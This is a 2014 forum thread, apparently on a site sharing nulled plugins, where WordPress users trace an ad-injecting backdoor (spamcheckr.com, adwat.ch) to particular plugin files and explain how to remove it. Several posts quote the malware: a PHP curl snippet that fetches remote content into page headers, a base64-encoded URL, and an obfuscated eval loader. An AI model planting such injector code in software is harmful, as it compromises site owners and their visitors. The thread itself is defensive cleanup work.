18.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

03-21-2014, 12:56 PM
Post: #51
RE:
(03-21-2014 10:52 AM)CreativeGenius81 Wrote:  I'd like to thank everyone for sharing their contributions to this thread b/c I also ran across this problem w/ a plugin that I installed (EventON).
After spending countless hours going over every line of code with a colleague, it finally dawned on me to look @ the code that "bale" suggested was the problem.

My file was hidden away in "classes/class-settings.php" and called by include 'classes/class-settings.php'; in my eventon.php file.

The key is to do a search (I used the Multi-File Search in TextWrangler of my entire site --- downloaded locally to my machine) for the following string: spamcheckr

The "infected" file (class-settings.php) has a ton of commented out lines of code, but it really only does one thing which is to pull the URL "http://spamcheckr.com/l.php". Just bringing that URL up in your browser will show a blank page. But if you view the source, you will see the following code:

Code:
var adwatch_id = 234224;    var adwatch_advert = "int";    var exclude_domains = ['wp-admin', 'wp-login', 'hillaryClinton2016.com', 'mpmgworld.com', 'madeforher.in', 'robfordformayor.ca', 'pachecovirtual.com.ar', 'corporativo2.tk', 'r3d.pt'];

As "bale" suggested, just delete the include from your file and delete that class-settings.php and you should be good to go.
Hope this helps.


thanks dude. we able to find the error with our site too. but the URL is different here http://spamcheckr.com/req.php so i think best solution is find for that spamcheckr.com then you can remove it. Again Thanks CreativeGenius81
03-21-2014, 09:13 PM
Post: #52
RE:
Hi in one off my themes (3clicks) i found the http://spamcheckr.com/l.php but on the other one (the7) cant find any string.
Does someone knows another location or link to search for?
Thanks
03-21-2014, 09:30 PM
Post: #53
RE:
Finally found it, the code is base64_decode("c3BhbWNoZWNrci5jb20vY2hlY2sucGhw") just find the string c3BhbWNoZWNrci5jb20vY2hlY2sucGhw.
Decoding this gives spamcheckr.com/check.php.
Hope that helps someone.
03-22-2014, 02:06 AM
Post: #54
RE: OK I FIND THE SOLUTION
Easy Social Share Buttons ALL have this (http://spamcheckr.com/l.php)http://adwat.ch/
1.DOWNLOAD TextCrawler SEARCH IN THIS PLUGIN spamcheckr (UNZIP FILES FIRST) THE CODE IS (<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc00_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc00_chesk');}} ?>) DELETE THIS CODE AND IS OK.
Easy Social Share Buttons v1.2.6 THE FILE IS lib\admin\pages\essb-settings-class.PHP
Easy Social Share Buttons v.1.2.1 – for WordPress THE FILE IS \lib\lib_class.PHP
03-22-2014, 05:57 AM (This post was last modified: 03-22-2014 05:58 AM by imxa.)
Post: #55
RE: OK I FIND THE SOLUTION
(03-22-2014 02:06 AM)djnikosdj Wrote:  Easy Social Share Buttons ALL have this (http://spamcheckr.com/l.php)http://adwat.ch/
1.DOWNLOAD TextCrawler SEARCH IN THIS PLUGIN spamcheckr (UNZIP FILES FIRST) THE CODE IS () DELETE THIS CODE AND IS OK.
Easy Social Share Buttons v1.2.6 THE FILE IS lib\admin\pages\essb-settings-class.PHP
Easy Social Share Buttons v.1.2.1 – for WordPress THE FILE IS \lib\lib_class.PHP

I need to delete the code inside php or delete the entire php file? I found the spamcheckr in

MASHMENU PLUGIN: \plugins\mashmenu\js\jscolor\settings.php
EASY SOCIAL SHARE BUTTONS PLUGIN: \plugins\easy-social-share-buttons\lib\lib_class.php


what should i do?
7.gif
03-22-2014, 02:07 PM (This post was last modified: 03-22-2014 02:52 PM by intrepid.)
Post: #56
RE:
For
Code:
clickjacker.net


/plugins /cj-plugin /includes / functions.php has 100's of lines of encrypted code (truncated here):

<?php eval("?>".base64_decode("PD9waHANCiNmdW5jdGlvbnMucG.................................hwDQoNCmZ1bmlKioqKioq​KioqKg0KDQoNCj8+")); ?>

Is this malware?

Edit: all 3 of the /includes/ php files have base64 code.
03-22-2014, 05:34 PM
Post: #57
RE: OK I FIND THE SOLUTION
(03-22-2014 05:57 AM)imxa Wrote:  
(03-22-2014 02:06 AM)djnikosdj Wrote:  Easy Social Share Buttons ALL have this (http://spamcheckr.com/l.php)http://adwat.ch/
1.DOWNLOAD TextCrawler SEARCH IN THIS PLUGIN spamcheckr (UNZIP FILES FIRST) THE CODE IS () DELETE THIS CODE AND IS OK.
Easy Social Share Buttons v1.2.6 THE FILE IS lib\admin\pages\essb-settings-class.PHP
Easy Social Share Buttons v.1.2.1 – for WordPress THE FILE IS \lib\lib_class.PHP

I need to delete the code inside php or delete the entire php file? I found the spamcheckr in

MASHMENU PLUGIN: \plugins\mashmenu\js\jscolor\settings.php
EASY SOCIAL SHARE BUTTONS PLUGIN: \plugins\easy-social-share-buttons\lib\lib_class.php

what should i do?
only the code and you are ok
03-24-2014, 08:47 PM
Post: #58
RE:
Hello, someone know how to search the whole WP .php files for specific phase " http://spamcheckr.com" ?
I got the same adwat.ch problem , and i cant find what plugin or file causes it , there are just too many files to browse manually.
Any ideas guys ?
03-24-2014, 09:29 PM (This post was last modified: 03-24-2014 09:35 PM by incomsis.)
Post: #59
RE:
I managed to find it with the help of this tool - fileseek

http://www.fileseek.ca/

Here is screenshot: http://puu.sh/7Hvp8/c796f49b08.png

Plugin infected: Visual Composer v4.0.1
Tho I don't remember where I downloaded it from.

More screenshots:
Dreamweaver: http://puu.sh/7Hvuz/9a77c5e065.png
Notepad++: http://puu.sh/7Hvxs/6b142cdcb3.png
WordPad: http://puu.sh/7HvAv/c0f9477a6c.png

The question is - how to remove it safely?

Because I am using the Visual Composer Plugin and if I delete the entire files I'm gettin errors...

Hope this info will help you find your infected files!

EDIT: For those who are using the same infected plugin,

here is a clean version of it, also the latest one - here

Here is a screenshot of the scan - it's clean.
03-25-2014, 02:47 PM (This post was last modified: 03-25-2014 02:49 PM by Gadzookz.)
Post: #60
RE:
Found the spamcheckr issue in WPRightClick plugin using fileSeek Pro.
70.gif




15.gif